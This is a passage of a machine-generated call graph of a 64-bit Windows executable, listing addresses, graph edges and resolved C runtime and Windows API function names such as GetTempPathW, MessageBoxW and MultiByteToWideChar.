16585 7ff6f0bd9167 LocalFree LocalFree 16583->16585 16586 7ff6f0bd9152 16584->16586 16587 7ff6f0bd9183 16585->16587 16589 7ff6f0bd918f 16585->16589 16586->16585 17468 7ff6f0bd2b50 16587->17468 16590 7ff6f0bdc5c0 _log10_special 8 API calls 16589->16590 16591 7ff6f0bd3c55 16590->16591 16591->16360 16592 7ff6f0bd8850 16591->16592 16593 7ff6f0bd8868 16592->16593 16594 7ff6f0bd88ea GetTempPathW GetCurrentProcessId 16593->16594 16595 7ff6f0bd888c 16593->16595 17477 7ff6f0bd25c0 16594->17477 16597 7ff6f0bd8a20 14 API calls 16595->16597 16598 7ff6f0bd8898 16597->16598 17484 7ff6f0bd81c0 16598->17484 16605 7ff6f0bd8918 __vcrt_freefls 16612 7ff6f0bd8955 __vcrt_freefls 16605->16612 17481 7ff6f0be8bd8 16605->17481 16610 7ff6f0bd89c4 __vcrt_freefls 16611 7ff6f0bdc5c0 _log10_special 8 API calls 16610->16611 16615 7ff6f0bd3cbb 16611->16615 16612->16610 16617 7ff6f0bd9400 2 API calls 16612->16617 16615->16360 16615->16373 16618 7ff6f0bd89a1 16617->16618 16619 7ff6f0bd89a6 16618->16619 16620 7ff6f0bd89d9 16618->16620 16622 7ff6f0bd9400 2 API calls 16619->16622 16621 7ff6f0be82a8 38 API calls 16620->16621 16621->16610 16623 7ff6f0bd89b6 16622->16623 16626 7ff6f0bd9422 MultiByteToWideChar 16625->16626 16627 7ff6f0bd9446 16625->16627 16626->16627 16629 7ff6f0bd945c __vcrt_freefls 16626->16629 16628 7ff6f0bd9463 MultiByteToWideChar 16627->16628 16627->16629 16628->16629 16629->16371 16641 7ff6f0bd33ce __scrt_get_show_window_mode 16630->16641 16631 7ff6f0bdc5c0 _log10_special 8 API calls 16633 7ff6f0bd3664 16631->16633 16632 7ff6f0bd35c7 16632->16631 16633->16301 16649 7ff6f0bd90c0 LocalFree 16633->16649 16635 7ff6f0bd1c80 49 API calls 16635->16641 16636 7ff6f0bd35e2 16638 7ff6f0bd2710 54 API calls 16636->16638 16638->16632 16640 7ff6f0bd35c9 16644 7ff6f0bd2710 54 API calls 16640->16644 16641->16632 16641->16635 16641->16636 16641->16640 16643 7ff6f0bd2a50 54 API calls 16641->16643 16647 7ff6f0bd35d0 16641->16647 17755 7ff6f0bd4550 16641->17755 17761 7ff6f0bd7e10 16641->17761 17773 7ff6f0bd1600 16641->17773 17821 7ff6f0bd7110 16641->17821 17825 7ff6f0bd4180 16641->17825 17869 7ff6f0bd4440 16641->17869 16643->16641 16644->16632 16648 7ff6f0bd2710 54 API calls 16647->16648 16648->16632 16651 7ff6f0bd1ca5 16650->16651 16652 7ff6f0be49f4 49 API calls 16651->16652 16653 7ff6f0bd1cc8 16652->16653 16653->16310 16655 7ff6f0bd9400 2 API calls 16654->16655 16656 7ff6f0bd8ba4 16655->16656 16657 7ff6f0be82a8 38 API calls 16656->16657 16658 7ff6f0bd8bb6 __vcrt_freefls 16657->16658 16658->16323 16660 7ff6f0bd45bc 16659->16660 16661 7ff6f0bd9400 2 API calls 16660->16661 16662 7ff6f0bd45e4 16661->16662 16663 7ff6f0bd9400 2 API calls 16662->16663 16664 7ff6f0bd45f7 16663->16664 18058 7ff6f0be6004 16664->18058 16667 7ff6f0bdc5c0 _log10_special 8 API calls 16668 7ff6f0bd392b 16667->16668 16668->16313 16669 7ff6f0bd7f80 16668->16669 16670 7ff6f0bd7fa4 16669->16670 16671 7ff6f0bd807b __vcrt_freefls 16670->16671 16672 7ff6f0be0744 73 API calls 16670->16672 16671->16317 16673 7ff6f0bd7fc0 16672->16673 16673->16671 18449 7ff6f0be7938 16673->18449 16675 7ff6f0be0744 73 API calls 16677 7ff6f0bd7fd5 16675->16677 16676 7ff6f0be040c _fread_nolock 53 API calls 16676->16677 16677->16671 16677->16675 16677->16676 16679 7ff6f0be00ec 16678->16679 18464 7ff6f0bdfe98 16679->18464 16681 7ff6f0be0105 16681->16313 16683 7ff6f0bdc8c0 16682->16683 16684 7ff6f0bd2734 GetCurrentProcessId 16683->16684 16685 7ff6f0bd1c80 49 API calls 16684->16685 16686 7ff6f0bd2787 16685->16686 16687 7ff6f0be49f4 49 API calls 16686->16687 16688 7ff6f0bd27cf 16687->16688 16689 7ff6f0bd2620 12 API calls 16688->16689 16690 7ff6f0bd27f1 16689->16690 16691 7ff6f0bdc5c0 _log10_special 8 API calls 16690->16691 16692 7ff6f0bd2801 16691->16692 16692->16301 16694 7ff6f0bd1c80 49 API calls 16693->16694 16695 7ff6f0bd44ed 16694->16695 16695->16355 16697 7ff6f0bd1c80 49 API calls 16696->16697 16698 7ff6f0bd4650 16697->16698 16698->16373 16700 7ff6f0bd6dc5 16699->16700 16701 7ff6f0bd3e6c 16700->16701 16702 7ff6f0be4f78 _get_daylight 11 API calls 16700->16702 16705 7ff6f0bd7330 16701->16705 16703 7ff6f0bd6dd2 16702->16703 16704 7ff6f0bd2910 54 API calls 16703->16704 16704->16701 18475 7ff6f0bd1470 16705->18475 16707 7ff6f0bd7358 16708 7ff6f0bd74a9 __vcrt_freefls 16707->16708 16709 7ff6f0bd4620 49 API calls 16707->16709 16708->16406 16710 7ff6f0bd737a 16709->16710 18581 7ff6f0bd6350 16773->18581 16781 7ff6f0bd3399 16782 7ff6f0bd3670 16781->16782 16783 7ff6f0bd367e 16782->16783 16793 7ff6f0be54dc EnterCriticalSection 16786->16793 16795 7ff6f0bd36bc GetModuleFileNameW 16794->16795 16795->16486 16795->16487 16797 7ff6f0bd932f FindClose 16796->16797 16798 7ff6f0bd9342 16796->16798 16797->16798 16799 7ff6f0bdc5c0 _log10_special 8 API calls 16798->16799 16800 7ff6f0bd371a 16799->16800 16800->16491 16800->16492 16802 7ff6f0bdc8c0 16801->16802 16803 7ff6f0bd2c70 GetCurrentProcessId 16802->16803 16832 7ff6f0bd26b0 16803->16832 16805 7ff6f0bd2cb9 16836 7ff6f0be4c48 16805->16836 16808 7ff6f0bd26b0 48 API calls 16809 7ff6f0bd2d34 FormatMessageW 16808->16809 16811 7ff6f0bd2d7f MessageBoxW 16809->16811 16812 7ff6f0bd2d6d 16809->16812 16814 7ff6f0bdc5c0 _log10_special 8 API calls 16811->16814 16813 7ff6f0bd26b0 48 API calls 16812->16813 16813->16811 16815 7ff6f0bd2daf 16814->16815 16815->16499 16817 7ff6f0bd93b0 GetFinalPathNameByHandleW CloseHandle 16816->16817 16818 7ff6f0bd3730 16816->16818 16817->16818 16818->16500 16818->16501 16820 7ff6f0bd2834 16819->16820 16821 7ff6f0bd26b0 48 API calls 16820->16821 16822 7ff6f0bd2887 16821->16822 16823 7ff6f0be4c48 48 API calls 16822->16823 16824 7ff6f0bd28d0 MessageBoxW 16823->16824 16825 7ff6f0bdc5c0 _log10_special 8 API calls 16824->16825 16826 7ff6f0bd2900 16825->16826 16826->16499 16828 7ff6f0bd94da WideCharToMultiByte 16827->16828 16829 7ff6f0bd9505 16827->16829 16828->16829 16830 7ff6f0bd951b __vcrt_freefls 16828->16830 16829->16830 16831 7ff6f0bd9522 WideCharToMultiByte 16829->16831 16830->16496 16831->16830 16833 7ff6f0bd26d5 16832->16833 16834 7ff6f0be4c48 48 API calls 16833->16834 16835 7ff6f0bd26f8 16834->16835 16835->16805 16838 7ff6f0be4ca2 16836->16838 16837 7ff6f0be4cc7 16839 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16837->16839 16838->16837 16840 7ff6f0be4d03 16838->16840 16842 7ff6f0be4cf1 16839->16842 16854 7ff6f0be3000 16840->16854 16844 7ff6f0bdc5c0 _log10_special 8 API calls 16842->16844 16843 7ff6f0be4de4 16845 7ff6f0bea9b8 __free_lconv_num 11 API calls 16843->16845 16846 7ff6f0bd2d04 16844->16846 16845->16842 16846->16808 16848 7ff6f0be4e0a 16848->16843 16850 7ff6f0be4e14 16848->16850 16849 7ff6f0be4db9 16851 7ff6f0bea9b8 __free_lconv_num 11 API calls 16849->16851 16853 7ff6f0bea9b8 __free_lconv_num 11 API calls 16850->16853 16851->16842 16852 7ff6f0be4db0 16852->16843 16852->16849 16853->16842 16855 7ff6f0be303e 16854->16855 16856 7ff6f0be302e 16854->16856 16857 7ff6f0be3047 16855->16857 16862 7ff6f0be3075 16855->16862 16858 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16856->16858 16859 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16857->16859 16860 7ff6f0be306d 16858->16860 16859->16860 16860->16843 16860->16848 16860->16849 16860->16852 16862->16856 16862->16860 16865 7ff6f0be3a14 16862->16865 16898 7ff6f0be3460 16862->16898 16935 7ff6f0be2bf0 16862->16935 16866 7ff6f0be3ac7 16865->16866 16867 7ff6f0be3a56 16865->16867 16870 7ff6f0be3b20 16866->16870 16871 7ff6f0be3acc 16866->16871 16868 7ff6f0be3af1 16867->16868 16869 7ff6f0be3a5c 16867->16869 16958 7ff6f0be1dc4 16868->16958 16872 7ff6f0be3a61 16869->16872 16873 7ff6f0be3a90 16869->16873 16876 7ff6f0be3b2a 16870->16876 16877 7ff6f0be3b37 16870->16877 16882 7ff6f0be3b2f 16870->16882 16874 7ff6f0be3ace 16871->16874 16875 7ff6f0be3b01 16871->16875 16872->16877 16879 7ff6f0be3a67 16872->16879 16873->16879 16873->16882 16880 7ff6f0be3a70 16874->16880 16885 7ff6f0be3add 16874->16885 16965 7ff6f0be19b4 16875->16965 16876->16868 16876->16882 16972 7ff6f0be471c 16877->16972 16879->16880 16886 7ff6f0be3aa2 16879->16886 16893 7ff6f0be3a8b 16879->16893 16896 7ff6f0be3b60 16880->16896 16938 7ff6f0be41c8 16880->16938 16882->16896 16976 7ff6f0be21d4 16882->16976 16885->16868 16888 7ff6f0be3ae2 16885->16888 16886->16896 16948 7ff6f0be4504 16886->16948 16888->16896 16954 7ff6f0be45c8 16888->16954 16890 7ff6f0bdc5c0 _log10_special 8 API calls 16892 7ff6f0be3e5a 16890->16892 16892->16862 16893->16896 16897 7ff6f0be3d4c 16893->16897 16983 7ff6f0be4830 16893->16983 16896->16890 16897->16896 16989 7ff6f0beea78 16897->16989 16899 7ff6f0be3484 16898->16899 16900 7ff6f0be346e 16898->16900 16903 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16899->16903 16904 7ff6f0be34c4 16899->16904 16901 7ff6f0be3ac7 16900->16901 16902 7ff6f0be3a56 16900->16902 16900->16904 16907 7ff6f0be3b20 16901->16907 16908 7ff6f0be3acc 16901->16908 16905 7ff6f0be3af1 16902->16905 16906 7ff6f0be3a5c 16902->16906 16903->16904 16904->16862 16915 7ff6f0be1dc4 38 API calls 16905->16915 16909 7ff6f0be3a61 16906->16909 16910 7ff6f0be3a90 16906->16910 16913 7ff6f0be3b2a 16907->16913 16914 7ff6f0be3b37 16907->16914 16920 7ff6f0be3b2f 16907->16920 16911 7ff6f0be3ace 16908->16911 16912 7ff6f0be3b01 16908->16912 16909->16914 16916 7ff6f0be3a67 16909->16916 16910->16916 16910->16920 16917 7ff6f0be3a70 16911->16917 16922 7ff6f0be3add 16911->16922 16918 7ff6f0be19b4 38 API calls 16912->16918 16913->16905 16913->16920 16921 7ff6f0be471c 45 API calls 16914->16921 16930 7ff6f0be3a8b 16915->16930 16916->16917 16923 7ff6f0be3aa2 16916->16923 16916->16930 16919 7ff6f0be41c8 47 API calls 16917->16919 16934 7ff6f0be3b60 16917->16934 16918->16930 16919->16930 16924 7ff6f0be21d4 38 API calls 16920->16924 16920->16934 16921->16930 16922->16905 16925 7ff6f0be3ae2 16922->16925 16926 7ff6f0be4504 46 API calls 16923->16926 16923->16934 16924->16930 16928 7ff6f0be45c8 37 API calls 16925->16928 16925->16934 16926->16930 16927 7ff6f0bdc5c0 _log10_special 8 API calls 16929 7ff6f0be3e5a 16927->16929 16928->16930 16929->16862 16931 7ff6f0be4830 45 API calls 16930->16931 16933 7ff6f0be3d4c 16930->16933 16930->16934 16931->16933 16932 7ff6f0beea78 46 API calls 16932->16933 16933->16932 16933->16934 16934->16927 17183 7ff6f0be1038 16935->17183 16939 7ff6f0be41ee 16938->16939 17001 7ff6f0be0bf0 16939->17001 16944 7ff6f0be4830 45 API calls 16945 7ff6f0be4333 16944->16945 16946 7ff6f0be4830 45 API calls 16945->16946 16947 7ff6f0be43c1 16945->16947 16946->16947 16947->16893 16949 7ff6f0be4539 16948->16949 16950 7ff6f0be4557 16949->16950 16951 7ff6f0be4830 45 API calls 16949->16951 16953 7ff6f0be457e 16949->16953 16952 7ff6f0beea78 46 API calls 16950->16952 16951->16950 16952->16953 16953->16893 16957 7ff6f0be45e9 16954->16957 16955 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16956 7ff6f0be461a 16955->16956 16956->16893 16957->16955 16957->16956 16959 7ff6f0be1df7 16958->16959 16960 7ff6f0be1e26 16959->16960 16962 7ff6f0be1ee3 16959->16962 16964 7ff6f0be1e63 16960->16964 17137 7ff6f0be0c98 16960->17137 16963 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16962->16963 16963->16964 16964->16893 16967 7ff6f0be19e7 16965->16967 16966 7ff6f0be1a16 16968 7ff6f0be0c98 12 API calls 16966->16968 16971 7ff6f0be1a53 16966->16971 16967->16966 16969 7ff6f0be1ad3 16967->16969 16968->16971 16970 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16969->16970 16970->16971 16971->16893 16973 7ff6f0be475f 16972->16973 16975 7ff6f0be4763 __crtLCMapStringW 16973->16975 17145 7ff6f0be47b8 16973->17145 16975->16893 16977 7ff6f0be2207 16976->16977 16978 7ff6f0be2236 16977->16978 16980 7ff6f0be22f3 16977->16980 16979 7ff6f0be0c98 12 API calls 16978->16979 16982 7ff6f0be2273 16978->16982 16979->16982 16981 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16980->16981 16981->16982 16982->16893 16984 7ff6f0be4847 16983->16984 17149 7ff6f0beda28 16984->17149 16990 7ff6f0beeaa9 16989->16990 16998 7ff6f0beeab7 16989->16998 16991 7ff6f0beead7 16990->16991 16992 7ff6f0be4830 45 API calls 16990->16992 16990->16998 16993 7ff6f0beeb0f 16991->16993 16994 7ff6f0beeae8 16991->16994 16992->16991 16996 7ff6f0beeb9a 16993->16996 16997 7ff6f0beeb39 16993->16997 16993->16998 17173 7ff6f0bf0110 16994->17173 16999 7ff6f0bef910 _fread_nolock MultiByteToWideChar 16996->16999 16997->16998 17176 7ff6f0bef910 16997->17176 16998->16897 16999->16998 17002 7ff6f0be0c27 17001->17002 17008 7ff6f0be0c16 17001->17008 17003 7ff6f0bed66c _fread_nolock 12 API calls 17002->17003 17002->17008 17004 7ff6f0be0c54 17003->17004 17005 7ff6f0be0c68 17004->17005 17006 7ff6f0bea9b8 __free_lconv_num 11 API calls 17004->17006 17007 7ff6f0bea9b8 __free_lconv_num 11 API calls 17005->17007 17006->17005 17007->17008 17009 7ff6f0bee5e0 17008->17009 17010 7ff6f0bee630 17009->17010 17011 7ff6f0bee5fd 17009->17011 17010->17011 17014 7ff6f0bee662 17010->17014 17012 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17011->17012 17013 7ff6f0be4311 17012->17013 17013->16944 17013->16945 17020 7ff6f0bee775 17014->17020 17023 7ff6f0bee6aa 17014->17023 17015 7ff6f0bee867 17064 7ff6f0bedacc 17015->17064 17017 7ff6f0bee82d 17057 7ff6f0bede64 17017->17057 17019 7ff6f0bee7fc 17050 7ff6f0bee144 17019->17050 17020->17015 17020->17017 17020->17019 17022 7ff6f0bee7bf 17020->17022 17025 7ff6f0bee7b5 17020->17025 17040 7ff6f0bee374 17022->17040 17023->17013 17031 7ff6f0bea514 17023->17031 17025->17017 17026 7ff6f0bee7ba 17025->17026 17026->17019 17026->17022 17029 7ff6f0bea970 _isindst 17 API calls 17030 7ff6f0bee8c4 17029->17030 17032 7ff6f0bea521 17031->17032 17033 7ff6f0bea52b 17031->17033 17032->17033 17037 7ff6f0bea546 17032->17037 17034 7ff6f0be4f78 _get_daylight 11 API calls 17033->17034 17039 7ff6f0bea532 17034->17039 17035 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17036 7ff6f0bea53e 17035->17036 17036->17013 17036->17029 17037->17036 17038 7ff6f0be4f78 _get_daylight 11 API calls 17037->17038 17038->17039 17039->17035 17073 7ff6f0bf411c 17040->17073 17044 7ff6f0bee420 17044->17013 17045 7ff6f0bee41c 17045->17044 17046 7ff6f0bee471 17045->17046 17047 7ff6f0bee43c 17045->17047 17126 7ff6f0bedf60 17046->17126 17122 7ff6f0bee21c 17047->17122 17051 7ff6f0bf411c 38 API calls 17050->17051 17052 7ff6f0bee18e 17051->17052 17053 7ff6f0bf3b64 37 API calls 17052->17053 17054 7ff6f0bee1de 17053->17054 17055 7ff6f0bee1e2 17054->17055 17056 7ff6f0bee21c 45 API calls 17054->17056 17055->17013 17056->17055 17058 7ff6f0bf411c 38 API calls 17057->17058 17059 7ff6f0bedeaf 17058->17059 17060 7ff6f0bf3b64 37 API calls 17059->17060 17061 7ff6f0bedf07 17060->17061 17062 7ff6f0bedf0b 17061->17062 17063 7ff6f0bedf60 45 API calls 17061->17063 17062->17013 17063->17062 17065 7ff6f0bedb44 17064->17065 17066 7ff6f0bedb11 17064->17066 17068 7ff6f0bedb5c 17065->17068 17070 7ff6f0bedbdd 17065->17070 17067 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17066->17067 17072 7ff6f0bedb3d __scrt_get_show_window_mode 17067->17072 17069 7ff6f0bede64 46 API calls 17068->17069 17069->17072 17071 7ff6f0be4830 45 API calls 17070->17071 17070->17072 17071->17072 17072->17013 17074 7ff6f0bf416f fegetenv 17073->17074 17075 7ff6f0bf7e9c 37 API calls 17074->17075 17078 7ff6f0bf41c2 17075->17078 17076 7ff6f0bf41ef 17081 7ff6f0bea514 __std_exception_copy 37 API calls 17076->17081 17077 7ff6f0bf42b2 17079 7ff6f0bf7e9c 37 API calls 17077->17079 17078->17077 17082 7ff6f0bf428c 17078->17082 17083 7ff6f0bf41dd 17078->17083 17080 7ff6f0bf42dc 17079->17080 17084 7ff6f0bf7e9c 37 API calls 17080->17084 17085 7ff6f0bf426d 17081->17085 17086 7ff6f0bea514 __std_exception_copy 37 API calls 17082->17086 17083->17076 17083->17077 17087 7ff6f0bf42ed 17084->17087 17088 7ff6f0bf5394 17085->17088 17093 7ff6f0bf4275 17085->17093 17086->17085 17090 7ff6f0bf8090 20 API calls 17087->17090 17089 7ff6f0bea970 _isindst 17 API calls 17088->17089 17091 7ff6f0bf53a9 17089->17091 17092 7ff6f0bf4356 __scrt_get_show_window_mode 17090->17092 17096 7ff6f0bf46ff __scrt_get_show_window_mode 17092->17096 17100 7ff6f0bf4397 memcpy_s 17092->17100 17102 7ff6f0be4f78 _get_daylight 11 API calls 17092->17102 17094 7ff6f0bdc5c0 _log10_special 8 API calls 17093->17094 17095 7ff6f0bee3c1 17094->17095 17118 7ff6f0bf3b64 17095->17118 17097 7ff6f0bf4a3f 17098 7ff6f0bf3c80 37 API calls 17097->17098 17104 7ff6f0bf5157 17098->17104 17099 7ff6f0bf49eb 17099->17097 17101 7ff6f0bf53ac memcpy_s 37 API calls 17099->17101 17112 7ff6f0bf4cdb memcpy_s __scrt_get_show_window_mode 17100->17112 17113 7ff6f0bf47f3 memcpy_s __scrt_get_show_window_mode 17100->17113 17101->17097 17103 7ff6f0bf47d0 17102->17103 17105 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17103->17105 17106 7ff6f0bf53ac memcpy_s 37 API calls 17104->17106 17111 7ff6f0bf51b2 17104->17111 17105->17100 17106->17111 17107 7ff6f0bf5338 17109 7ff6f0bf7e9c 37 API calls 17107->17109 17108 7ff6f0be4f78 11 API calls _get_daylight 17108->17113 17109->17093 17110 7ff6f0be4f78 11 API calls _get_daylight 17110->17112 17111->17107 17114 7ff6f0bf3c80 37 API calls 17111->17114 17116 7ff6f0bf53ac memcpy_s 37 API calls 17111->17116 17112->17097 17112->17099 17112->17110 17117 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 17112->17117 17113->17099 17113->17108 17115 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 17113->17115 17114->17111 17115->17113 17116->17111 17117->17112 17119 7ff6f0bf3b83 17118->17119 17120 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17119->17120 17121 7ff6f0bf3bae memcpy_s 17119->17121 17120->17121 17121->17045 17123 7ff6f0bee248 memcpy_s 17122->17123 17124 7ff6f0be4830 45 API calls 17123->17124 17125 7ff6f0bee302 memcpy_s __scrt_get_show_window_mode 17123->17125 17124->17125 17125->17044 17127 7ff6f0bedf9b 17126->17127 17131 7ff6f0bedfe8 memcpy_s 17126->17131 17128 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17127->17128 17129 7ff6f0bedfc7 17128->17129 17129->17044 17130 7ff6f0bee053 17132 7ff6f0bea514 __std_exception_copy 37 API calls 17130->17132 17131->17130 17133 7ff6f0be4830 45 API calls 17131->17133 17136 7ff6f0bee095 memcpy_s 17132->17136 17133->17130 17134 7ff6f0bea970 _isindst 17 API calls 17135 7ff6f0bee140 17134->17135 17136->17134 17138 7ff6f0be0ccf 17137->17138 17144 7ff6f0be0cbe 17137->17144 17139 7ff6f0bed66c _fread_nolock 12 API calls 17138->17139 17138->17144 17140 7ff6f0be0d00 17139->17140 17141 7ff6f0be0d14 17140->17141 17142 7ff6f0bea9b8 __free_lconv_num 11 API calls 17140->17142 17143 7ff6f0bea9b8 __free_lconv_num 11 API calls 17141->17143 17142->17141 17143->17144 17144->16964 17146 7ff6f0be47de 17145->17146 17147 7ff6f0be47d6 17145->17147 17146->16975 17148 7ff6f0be4830 45 API calls 17147->17148 17148->17146 17150 7ff6f0beda41 17149->17150 17151 7ff6f0be486f 17149->17151 17150->17151 17157 7ff6f0bf3374 17150->17157 17153 7ff6f0beda94 17151->17153 17154 7ff6f0be487f 17153->17154 17155 7ff6f0bedaad 17153->17155 17154->16897 17155->17154 17170 7ff6f0bf26c0 17155->17170 17158 7ff6f0beb1c0 __CxxCallCatchBlock 45 API calls 17157->17158 17159 7ff6f0bf3383 17158->17159 17160 7ff6f0bf33ce 17159->17160 17169 7ff6f0bf0348 EnterCriticalSection 17159->17169 17160->17151 17171 7ff6f0beb1c0 __CxxCallCatchBlock 45 API calls 17170->17171 17172 7ff6f0bf26c9 17171->17172 17179 7ff6f0bf6df8 17173->17179 17177 7ff6f0bef919 MultiByteToWideChar 17176->17177 17182 7ff6f0bf6e5c 17179->17182 17180 7ff6f0bdc5c0 _log10_special 8 API calls 17181 7ff6f0bf012d 17180->17181 17181->16998 17182->17180 17184 7ff6f0be107f 17183->17184 17185 7ff6f0be106d 17183->17185 17187 7ff6f0be10c9 17184->17187 17189 7ff6f0be108d 17184->17189 17186 7ff6f0be4f78 _get_daylight 11 API calls 17185->17186 17188 7ff6f0be1072 17186->17188 17192 7ff6f0be1445 17187->17192 17194 7ff6f0be4f78 _get_daylight 11 API calls 17187->17194 17190 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17188->17190 17191 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17189->17191 17199 7ff6f0be107d 17190->17199 17191->17199 17193 7ff6f0be4f78 _get_daylight 11 API calls 17192->17193 17192->17199 17195 7ff6f0be16d9 17193->17195 17196 7ff6f0be143a 17194->17196 17197 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17195->17197 17198 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17196->17198 17197->17199 17198->17192 17199->16862 17201 7ff6f0be0774 17200->17201 17228 7ff6f0be04d4 17201->17228 17203 7ff6f0be078d 17203->16515 17240 7ff6f0be042c 17204->17240 17208 7ff6f0bdc8c0 17207->17208 17209 7ff6f0bd2930 GetCurrentProcessId 17208->17209 17210 7ff6f0bd1c80 49 API calls 17209->17210 17211 7ff6f0bd2979 17210->17211 17254 7ff6f0be49f4 17211->17254 17216 7ff6f0bd1c80 49 API calls 17217 7ff6f0bd29ff 17216->17217 17284 7ff6f0bd2620 17217->17284 17220 7ff6f0bdc5c0 _log10_special 8 API calls 17221 7ff6f0bd2a31 17220->17221 17221->16554 17223 7ff6f0be0189 17222->17223 17227 7ff6f0bd1b89 17222->17227 17224 7ff6f0be4f78 _get_daylight 11 API calls 17223->17224 17225 7ff6f0be018e 17224->17225 17226 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17225->17226 17226->17227 17227->16553 17227->16554 17229 7ff6f0be053e 17228->17229 17230 7ff6f0be04fe 17228->17230 17229->17230 17232 7ff6f0be054a 17229->17232 17231 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17230->17231 17233 7ff6f0be0525 17231->17233 17239 7ff6f0be54dc EnterCriticalSection 17232->17239 17233->17203 17241 7ff6f0bd1a20 17240->17241 17242 7ff6f0be0456 17240->17242 17241->16522 17241->16523 17242->17241 17243 7ff6f0be04a2 17242->17243 17244 7ff6f0be0465 __scrt_get_show_window_mode 17242->17244 17253 7ff6f0be54dc EnterCriticalSection 17243->17253 17246 7ff6f0be4f78 _get_daylight 11 API calls 17244->17246 17248 7ff6f0be047a 17246->17248 17251 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17248->17251 17251->17241 17258 7ff6f0be4a4e 17254->17258 17255 7ff6f0be4a73 17256 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17255->17256 17261 7ff6f0be4a9d 17256->17261 17257 7ff6f0be4aaf 17293 7ff6f0be2c80 17257->17293 17258->17255 17258->17257 17262 7ff6f0bdc5c0 _log10_special 8 API calls 17261->17262 17264 7ff6f0bd29c3 17262->17264 17263 7ff6f0bea9b8 __free_lconv_num 11 API calls 17263->17261 17272 7ff6f0be51d0 17264->17272 17265 7ff6f0be4b8c 17265->17263 17266 7ff6f0be4b61 17270 7ff6f0bea9b8 __free_lconv_num 11 API calls 17266->17270 17267 7ff6f0be4bb0 17267->17265 17269 7ff6f0be4bba 17267->17269 17268 7ff6f0be4b58 17268->17265 17268->17266 17271 7ff6f0bea9b8 __free_lconv_num 11 API calls 17269->17271 17270->17261 17271->17261 17273 7ff6f0beb338 _get_daylight 11 API calls 17272->17273 17274 7ff6f0be51e7 17273->17274 17275 7ff6f0beec08 _get_daylight 11 API calls 17274->17275 17276 7ff6f0be5227 17274->17276 17281 7ff6f0bd29e5 17274->17281 17277 7ff6f0be521c 17275->17277 17276->17281 17431 7ff6f0beec90 17276->17431 17278 7ff6f0bea9b8 __free_lconv_num 11 API calls 17277->17278 17278->17276 17281->17216 17282 7ff6f0bea970 _isindst 17 API calls 17283 7ff6f0be526c 17282->17283 17285 7ff6f0bd262f 17284->17285 17286 7ff6f0bd9400 2 API calls 17285->17286 17287 7ff6f0bd2660 17286->17287 17288 7ff6f0bd2683 MessageBoxA 17287->17288 17289 7ff6f0bd266f MessageBoxW 17287->17289 17290 7ff6f0bd2690 17288->17290 17289->17290 17291 7ff6f0bdc5c0 _log10_special 8 API calls 17290->17291 17292 7ff6f0bd26a0 17291->17292 17292->17220 17294 7ff6f0be2cbe 17293->17294 17295 7ff6f0be2cae 17293->17295 17296 7ff6f0be2cc7 17294->17296 17301 7ff6f0be2cf5 17294->17301 17297 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17295->17297 17298 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17296->17298 17299 7ff6f0be2ced 17297->17299 17298->17299 17299->17265 17299->17266 17299->17267 17299->17268 17300 7ff6f0be4830 45 API calls 17300->17301 17301->17295 17301->17299 17301->17300 17303 7ff6f0be2fa4 17301->17303 17307 7ff6f0be3610 17301->17307 17333 7ff6f0be32d8 17301->17333 17363 7ff6f0be2b60 17301->17363 17305 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17303->17305 17305->17295 17308 7ff6f0be3652 17307->17308 17309 7ff6f0be36c5 17307->17309 17312 7ff6f0be36ef 17308->17312 17313 7ff6f0be3658 17308->17313 17310 7ff6f0be371f 17309->17310 17311 7ff6f0be36ca 17309->17311 17310->17312 17323 7ff6f0be372e 17310->17323 17331 7ff6f0be3688 17310->17331 17314 7ff6f0be36ff 17311->17314 17315 7ff6f0be36cc 17311->17315 17380 7ff6f0be1bc0 17312->17380 17320 7ff6f0be365d 17313->17320 17313->17323 17387 7ff6f0be17b0 17314->17387 17316 7ff6f0be366d 17315->17316 17322 7ff6f0be36db 17315->17322 17332 7ff6f0be375d 17316->17332 17366 7ff6f0be3f74 17316->17366 17320->17316 17321 7ff6f0be36a0 17320->17321 17320->17331 17321->17332 17376 7ff6f0be4430 17321->17376 17322->17312 17325 7ff6f0be36e0 17322->17325 17323->17332 17394 7ff6f0be1fd0 17323->17394 17328 7ff6f0be45c8 37 API calls 17325->17328 17325->17332 17327 7ff6f0bdc5c0 _log10_special 8 API calls 17329 7ff6f0be39f3 17327->17329 17328->17331 17329->17301 17331->17332 17401 7ff6f0bee8c8 17331->17401 17332->17327 17334 7ff6f0be32e3 17333->17334 17335 7ff6f0be32f9 17333->17335 17337 7ff6f0be3652 17334->17337 17338 7ff6f0be36c5 17334->17338 17339 7ff6f0be3337 17334->17339 17336 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17335->17336 17335->17339 17336->17339 17342 7ff6f0be36ef 17337->17342 17343 7ff6f0be3658 17337->17343 17340 7ff6f0be371f 17338->17340 17341 7ff6f0be36ca 17338->17341 17339->17301 17340->17342 17352 7ff6f0be372e 17340->17352 17361 7ff6f0be3688 17340->17361 17344 7ff6f0be36ff 17341->17344 17345 7ff6f0be36cc 17341->17345 17347 7ff6f0be1bc0 38 API calls 17342->17347 17350 7ff6f0be365d 17343->17350 17343->17352 17348 